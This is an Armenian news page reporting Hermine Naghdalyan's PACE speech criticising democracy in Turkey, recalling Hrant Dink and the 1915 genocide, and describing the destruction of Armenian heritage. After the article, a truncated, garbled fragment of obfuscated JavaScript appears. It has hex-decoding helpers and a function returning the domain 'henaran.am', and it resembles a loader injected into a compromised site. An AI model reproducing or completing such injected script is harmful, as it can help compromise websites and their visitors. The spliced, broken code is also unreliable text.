15 Նոյեմբերի, Ուրբաթ, 2024
KFC

Նաղդալյանը ԵԽԽՎ-ում. Եկեք կանխե՛նք պատմության կրկնությունը

Հունիսի 22-ին ԵԽԽՎ ամառային նստաշրջանի լիագումար նիստի օրակարգում քննարկման դրվեց ` « Թուրքիայում ժողովրդավարական հաստատությունների գործունեությունը» թեմայով զեկույցը, որի ընթացքում ԵԽԽՎ հայկական պատվիրակության ղեկավար, ԱԺ փոխնախագահ Հերմինե Նաղդալյանը հանդես եկավ ելույթով` խստագույնս դատապարտելով Թուրքիայում տիրող ժողովրդավարական իրավիճակը:

 

Շնորհակալություն հայտնելով համազեկուցողներ Գոդսքեսենին և Վուցկովիչին, զեկույցի վրա կատարած զգալի աշխատանքի և դրա համապարփակ բնույթի համար`Հերմինե Նաղդալյանը իր խոսքում նշեց, որ այդ փաստաթուղթը առաջ է քաշում այն բոլոր լրջագույն մտահոգությունները, որոնց  Թուրքիան «պետք է անհապաղ անդրադառնա», այս զեկույցը պարզորոշ մատնանշում է Թուրքիայում լայնամասշտաբ ժողովրդավարական հաստատությունների պակասը:

 

Ի թիվս բազմաթիվ խնդիրների և լուրջ խախտումների`օրենքի գերակայության, օրենսդրության, դատական իշխանության, համայնքների միջև հարաբերությունների ոլորտներում, զեկույցում նաև հատուկ անդրադարձ է կատարվում խոսքի ազատության և ԶԼՄ-ների վրա քաղաքական ազդեցության ու  սահմանափակումների, հետաքննող լրագրողների, ակադեմիկոսների և շարքային քաղաքացիների հետապնդման վերաբերյալ:

 

«Ցանկացած փորձ` ճշգրիտ տեղեկատվություն հայթայթելու, որը տարբերվում է պաշտոնական տեսակետից, հալածվում և ճնշվում է Թուրքիայում»,- իր խոսքում նշեց տիկին Նաղդալյանը` որպես այդ դեպրեսիվ քաղաքականության զոհերից մեկի հիշատակելով  Հրանտ Դինքին, հայկական ծագմամբ ականավոր թուրք լրագրողին, ով ցինիկաբար սպանվեց Ստամբուլում, 2007թ.-ին:

«Դինքը բարձրացնում էր հայերի ցեղասպանությանն առնչվող հարցեր, նա հայկական և թուրքական հասարակությունների հաշտեցման կողմնակից էր, պայքարում էր, մարդկային արժանապատվության և ազատությունների համար` իր երկրում` Թուրքիայում»,- նշել է Հ. Նաղդալյանը:

 

ԱԺ փոխնախագահը իր ելույթում մտահոգություն է հայտնել  և եվրոպացի գործընկերների ուշադրությունն է հրավիրել Մայիսի 20-ին թուրքական խորհրդարանի կողմից ընդունված մի օրինագծի առնչությամբ, որը թույլատրում է օրենսդիրների դեմ քրեական հետապնդումը:

«Նոր օրենքը թիրախավորված է ընդդիմադիր օրենսդիրների դեմ:  Ընդդիմությունը ներկայացնող մեր խորհրդարանական գործընկերները Թուրքիայում իրական վտանգի տակ են: Կցանկանայի հիշեցնել, որ 1915 թվականի առաջին զոհերը եղել են Թուրքիայի խորհրդարանի հայազգի պատգամավորները, այսինքն՝ հարյուրամյակ է անցել, բայց ինչ մեթոդներով որ 101 տարի առաջ են լուծել հայերի հարցը, այդպես էլ այսօր քրդերի հարցն են լուծում: Եկեք կանխե՛նք պատմության կրկնությունը», – բարձրաձայնել է տիկին Նաղդալյանը:

 

Իր երախտագիտությունը հայտնելով գերմանացի պատգամավորներին` Բունդեսթագի կողմից ընդունված վերջին որոշման առիթով, Հերմինե Նաղդալյանն արձանագրել է, որ այդ որոշումն առաջացրել է թուրքական իշխանությունների վրդովմունքը: Տիկին Նաղդալյանը փաստել է, որ Գերմանացի օրենսդիրները ականատեսը եղան աննախադեպ ատելության կոչերի և ահաբեկման դրսևորումների: Բանաձևի նախաձեռնողները մահվան անանուն սպառնալիքներ ստացան, նրանցից ոմանք ոստիկանության պաշտպանության տակ անցան: Նախագահ Էրդողանը արյան անալիզ պահանջեց թուրքական ծագմամբ գերմանացի օրենսդիրներից, մինչդեռ` «ինչպես նշեց Բունդեսթագի նախագահը` «…մարդկանց արյամբ տարորոշելու դարաշրջանն ավարտվել է դեռևս 1945-ին»: Ցավոք, ոչ Թուրքիայում, պարոն Լամերթ»,- եզրափակել է Հ. Նաղդալյանը:

 

Իր ելույթում Հերմինե Նադալյանը անդրադարձել է նաև մշակութային ժառանգության պահպանման խնդրին.

«Ժամանակակից Թուրքիայում պատմականորեն գոյություն ունեն հազարավոր հայկական մշակութային և հոգևոր հուշարձաններ, որոնք շարունակաբար և միտումնավոր ոչնչացվել են: Սա թուրքական կառավարության նախապես ծրագրված` հայկական մշակույթի նյութական վկայությունները վերացնելու քաղաքականությունն է»,- ասել է տիկին Նաղդալյանը` հավելելով, որ 1915թ-ի ցեղասպանությունը ներկայումս շարունակվում է` հայկական ժառանգության դեմ մշակութային ցեղասպանության տեսքով:

 

«Ժամանակակից Թուրքիան վերածվում է Օսմանյան ժամանակաշրջանի Թուրքիայի, կայսրությունում գործող արժեքների անմիջական ժառանգորդի»,- իր խոսքում ընդգծել է Հ. Նաղդալյանը` եվրոպացի խորհրդարանականներին կոչ անելով որպես առաջին քայլ, առաջին հերթին ի շահ Թուրքիայի, մոնիտորինգի գործընթաց սկսել այդ երկրում:

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “henaran.am”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

KFC

Արխիվ

Նոյեմբերի 2024
ԵԵՉՀՈՒՇԿ
    123
45678910
11121314151617
18192021222324
252627282930 
Հոկտեմբերի

ՎԵՐՋԻՆ ԼՈւՐԵՐ